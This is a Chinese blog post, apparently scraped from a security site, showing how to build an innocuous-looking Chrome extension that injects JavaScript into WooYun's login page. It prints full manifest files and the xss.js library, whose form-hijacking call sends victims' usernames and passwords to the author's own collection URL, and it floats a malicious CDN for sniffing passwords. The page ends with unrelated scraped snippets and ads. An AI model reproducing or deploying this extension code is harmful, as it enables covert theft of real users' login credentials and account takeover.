利用Chrome插件向指定页面植入js,劫持 XSS

资源来自:http://www.2cto.com/Article/201307/225986.html
首页 > 安全 > 网站安全 > 正文
利用Chrome插件向指定页面植入js,劫持 XSS,一些猥琐的想法与实践
2013-07-08      0个评论      
收藏    我要投稿
0x00 Chrome插件
--------------------------
这个想法是昨天看到@紫梦芊 的帖子想起来的。
想法如下:
Chrome插件是可以通过manifest.json的控制,向指定页面植入contentscript.js里的脚本的。那么,能不能在一个看似正常的插件里,安放一个小功能:在所有乌云的页面里<script src=//xsser.me></script>呢?
于是,开始实践。(为了方便,只是弹了一个小框框)。
Manifest.json内容:

?


1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

{

  "name": "XiaoChaJian",

  "version": "1.0",

  "manifest_version": 2,

  "author":"VIP",

  "icons": {

      "128": "icon.png"

   },

  "permissions": [

    "tabs","http://*/*","https://*/*"

  ],

  "content_scripts": [

    {"js":["contentscript.js"],"matches": ["http://wooyun.org/*","http://*.wooyun.org/*"]}

   ]

}

contentscript.js内容:

alert(/xss/);

商之翼专业电商解决方案提供商

【点击进入】

为企业和创业者提供电商系统及解决方案 13年电商服务经验,专注+专业 为电商助力!

查 看

那么,将弹框换成xsser.me,是不是就能截获想要的cookies了呢?
很遗憾,这种方法在乌云无效,因为乌云的cookies是HTTP-ONLY的。虽然插件上也能获取http-only的cookies(像Edit this cookie和cookie快速模拟一样),但是很麻烦,于是,又有一个猥琐的想法诞生了:在乌云的登录页面中,插入@Sogili的xss.js来劫持表单,是不是就能把用户名和密码发送到我们想要的地方去了呢?
开始实践:
Manifest.json内容:

?


1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

{

  "name": "JieChiBiaoDan",

  "version": "1.0",

  "manifest_version": 2,

 

 

"author":"VIP",

  "icons": {

      "128": "icon.png"

 

 

},

  "permissions": [

    "tabs","http://*/*","https://*/*"

  ],

 

 

"content_scripts": [

    {"js":["contentscript.js"],"matches":

 

["http://wooyun.org/user.php?

 

action=login*","http://www.wooyun.org/user.php?action=login*"]}

 

 

]

}

contentscript.js内容:

;;var xss = function(){

  var x = {

    ‘name‘:‘xss.js‘,

    ‘version‘:‘0.2.1‘,

    ‘author‘:‘长短短(sogili)‘

  };

 

  x.x=function(id){return document.getElementById(id)};

 

  //容错取值

  x.e=function(_){try{return eval(‘(‘+_+‘)‘)}catch(e){return‘‘}};

 

  //浏览器

  x.i={

    i:!!self.ActiveXObject&&(function(){

      for(var v=6,s=document.createElement(‘s‘);

        s.innerHTML=‘<![if gt IE ‘+(v++)+‘]

 

><i></i><![endif]-->‘,

        s.getElementsByTagName(‘i‘)[0];);

      return v;

    }()),

    c:!!self.chrome,

    f:self.mozPaintCount>-1,

    o:!!self.opera,

    s:!self.chrome&&!!self.WebKitPoint

  };

 

  //UA

  x.ua = navigator.userAgent;

 

  //判断是否为苹果手持设备

  x.apple=/ip(one|ad|od)/i.test(x.ua);

 

  //随机数

  x.rdm=function(){return~~(Math.random()*1e5)};

 

  //url编码(UTF8)

  x.ec=encodeURIComponent;

 

  x.html=function(){

    return document.getElementsByTagName(‘html‘)[0]

        ||document.write(‘<html>‘)

        ||document.getElementsByTagName

 

(‘html‘)[0];

  };

 

  /*

   * 销毁一个元素

   */

  x.kill=function(e){

    e.parentElement.removeChild(e);

  };

 

  /*

   *绑定事件

   */

  x.bind=function(e,name,fn){

    e.addEventListener?e.addEventListener

 

(name,fn,false):e.attachEvent("on"+name,fn);

  };

 

  /*

   * dom准备完毕时执行函数

   */

  x.ready=function(fn){

    if(!x.i.i){

      x.bind(document,‘DOMContentLoaded‘,fn);

    }else{

      var s = setInterval(function(){

        try{

          document.body.doScroll(‘left‘);

          clearInterval(s);

          fn();

        }catch(e){}

      },4);

    }

  }

 

  /*

   * 同源检测

   */

  x.o=function(url){

    var link = x.dom(‘<a href="‘+encodeURI(url)+‘">‘,1);

    return link.protocol+link.hoatname+‘:‘+(link.port||80)

 

==location.protocol+location.hoatname+‘:‘+(location.port||80);

  };

 

  /*

   * html to dom

   */

  x.dom=function(html,gcsec){

    var tmp = document.createElement(‘span‘);

    tmp.innerHTML=html;

    var e = tmp.children[0];

    e.style.display=‘none‘;

    x.html().appendChild(e);

    gcsec>>0>0&&setTimeout(function(){

      x.kill(e);

    },gcsec*1000);

    return e;

  };

 

  /*

   * ajax

   */

  x.ajax=function(url,params,callback){

    (params instanceof Function)&&

 

(callback=params,params=void(0));

    var XHR = (!x.o(url)&&window.XDomainRequest)||

          window.XMLHttpRequest||

          (function(){return new ActiveXObject

 

(‘MSXML2.XMLHTTP‘)});

    var xhr = new XHR();

    xhr.open(params?‘post‘:‘get‘,url);

    xhr.withCredentials = true;

    try{params&&xhr.setRequestHeader(‘content-

 

type‘,‘application/x-www-form-urlencoded‘);}catch(e){}

    callback&&(xhr.onreadystatechange = function() {

      (this.readyState == 4 && ((this.status >= 200

 

&& this.status <= 300) || this.status == 304))&&callback.apply

 

(this,arguments);

    });

    xhr.send(params);

  };

 

  /*

   * CSRF

   */

  x.csrf=function(url,params,callback){

    (params instanceof Function)&&

 

(callback=params,params=void(0));

    if(params){

      var form = x.dom(‘<form method=post>‘);

      form.action=url;

      for(var name in params){

        var input = document.createElement

 

(‘input‘);

        input.name=name;

        input.value=params[name];

        form.appendChild(input);

      }

      var iframe = x.dom(‘<iframe sandbox

 

name=_‘+x.rdm()+‘_>‘,6);

      callback&&setTimeout(function(){

        x.bind(iframe,‘load‘,callback);

      },30);

      form.target=iframe.name;

      form.submit();

    }else{

      var img = new Image();

      callback&&(img.onerror=callback);

      img.src=url;

    }

  };

 

  /*

   * 表单劫持

   */

  x.xform=function(form,action){

 

 

form.old_action=form.action,form.old_target=form.target,form.action=act

 

ion;

    var iframe = x.dom(‘<iframe name=_‘+x.rdm()+‘_>‘);

    form.target=iframe.name;

    setTimeout(function(){

      x.bind(iframe,‘load‘,function(){

 

 

form.action=form.old_action,form.target=form.old_target,form.onsubmit=n

 

ull,form.submit();

      });

    },30);

  };

 

  /*

   * 函数代理

   */

  x.proxy=function(fn,before,after){

    return function(){

      before&&before.apply(this,arguments);

      var result = fn.apply(this,arguments);

      after&&after.apply(this,arguments);

      return result;

    }

  };

 

  return x;

}();

xss.xform(document.forms[1],http://vip.yupage.com/wy.php);//劫持表单

http://vip.yupage.com/wy.php是我做好的一个接收页面,代码如下:

开始测试,打开登录页,填好用户名密码验证码,点击登录,首先会像我的接收页发起POST,然后才会POST乌云。

商之翼专业电商解决方案提供商

【点击进入】

为企业和创业者提供电商系统及解决方案 13年电商服务经验,专注+专业 为电商助力!

查 看

再去看看,用户名密码已经躺在那里了。

在不知情的情况下,用户名和密码就这样被劫持走了。乌云的wb转账功能可是没有二次验证的哦。
0x01 CDN
---------------
现在有许许多多的网站使用了CDN来进行加速/防D等。
去搜索了下CDN的工作原理,大概是这样的。
用户访问-》自动分配最快的节点-》请求原服务器-------
返回给用户《-返回给节点服务器《-原服务器返回数据<-|
那么,能不能搭建一台恶意的CDN,然后嗅探所有使用了该CDN的网站的用户名密码呢?

时间: 2024-10-20 20:57:40

利用Chrome插件向指定页面植入js,劫持 XSS的相关文章

chrome插件:提取页面数据

近期在做chrome插件,需要提取页面里的一些数,简单说就是企业版微博的后台数据,因为微博不提供导出功能.最开始是用php完成的,但是每次都需要先把页面代码保存下来,再进行提取,很麻烦.chrome插件可以和页面DOM交互,看起来很方便,所以开始学着写.javascript和jQuery都是边学习边写. 以下代码实现了把需要的数据提出来,需要补充xmlHttpObject部分. <script type="text/javascript" charset="UTF-8&

怎么实现在jenkens页面配置sonar,以及如何利用cobertura插件实现sonar页面显示测试覆盖率

最近我在工作中遇到需要给项目中每个模块配置Sonarqube,来看看测试用例覆盖的情况.在这个过程中遇到了一些问题,也查了很多资料.现在记录一下具体应该怎么配置. 先展示一下实现的效果: 图一 It will show: 图二 现在来看看具体配置: 要enable Sonarqube, 需在 job --> configure --> Post-build Actions 配置Branch 和 JDK 信息: 图三 配置好了以后,SonarQube 可以在页面上显示出来了,点击进去,效果图:[

利用chrome插件批量读取浏览器页面内容并写入数据库

试想一下,如果每天要收集100页网页数据甚至更多.如果采用人工收集会吐血,用程序去收集也就成为一个不二的选择.首先肯定会想到说用java.php.C#等高级语言,但这偏偏又有个登陆和验证码,搞到无所适从.还在为收集web端的数据感到苦恼吗?很高兴,你找对地方了. 应用场景: 1.需要每天大量重复收集web端的数据 2.web页面数据需要登陆后才能采集 3.web页面存在翻页 解决方案: 手工登陆,然后采用chrome插件的方式进行收集.当然你会说用selenium等自动化测试的方法进行收集更co

利用Google Chrome开发插件,在网页中植入js代码

Google Chrome是一个很强大的浏览器,提供了各种各样的插件,大大提升了使用了的效率,比如vimium.honx等. Google在提供这些插件的同时还允许用户开发自己的插件. 最近在写js的脚本采集程序,需要测试在网页中的运行情况,因此可以利用Chrome插件进行测试. 1.首先第一步是新建一个文件夹,并新建一个manifest.json文件,内容如下 { "manifest_version": 2, "name": "Js implants&q

Chrome插件(Extensions)开发攻略

目录 为什么需要 为什么是Chrome 需要准备什么 如何开始 Page Action Chrome插件结构 学习资料 我的例子 调试 调试Content Scripts 调试Background 调试Popup 一些问题 总结 为什么需要 简单地说,浏览器插件,可以大大的扩展你的浏览器的功能.包括但不仅限于这些功能:捕捉特定网页的内容,捕捉HTTP报文,捕捉用户浏览动作,改变浏览器地址栏/起始页/书签/Tab等界面元素的行为,与别的站点通信,修改网页内容--给你增加许多想象空间,试想想看,你可

实用chrome插件

2015年最实用的9款chrome插件 随着14年chrome浏览器的市场超过IE浏览器,chrome凭借它强劲性能和出色的使用体验真正的登上了平民级的殿堂.今天小编就为大家推荐9款自己常用的chrome插件神器. 1.非常实用的chrome新标签页---Infinity新标签页 Infinity新标签页插件是一款可以把chrome默认新标签页换成一个美观实用的infinity新标签页,不仅有简洁美观的页面,还有快速拨号,邮件提醒,天气预报,笔记功能,待办事项,壁纸,历史记录管理等. 2.Chr

chrome 浏览器插件开发(二)—— 通信 获取页面 编写chrome插件专用的库

在chrome插件的开发过程中,我遇到了一些问题,在网上找了不少文章,可能是浏览器升级的原因,有一些是有效的也有无效的.下面我简单的分享一下我遇到的坑,以及我把这些坑的解决方案整理而成的js库 —— crxTool . 一.坑和铲子 1.browser action或page action与content script通信 在网上找了不少方法,最后选择的方法如下: 发送消息: 1 var send= function(data, cb){ 2 chrome.tabs.query({active:

js指定时间之后跳转到指定页面代码实例

js指定时间之后跳转到指定页面代码实例:在某些场景下,需要网页在指定的时间后,网页能够自动跳转到指定页面,比如在无法找到指定网页的情况下,就会显示之前设置好的404页面,并且跳转到指定的页面,下面就是一段代码实现了此效果.代码如下: <!DOCTYPE html> <html> <head> <meta charset=" utf-8"> <meta name="author" content="htt

js 弹出提示信息,并跳转指定页面代码分享

using System.Web; /// <summary>/// 客户端脚本输出/// </summary>public class JsHelper{    /// <summary>    /// 弹出信息,并跳转指定页面.    /// </summary>    public static void AlertAndRedirect(string message, string toURL)    {        string js = &qu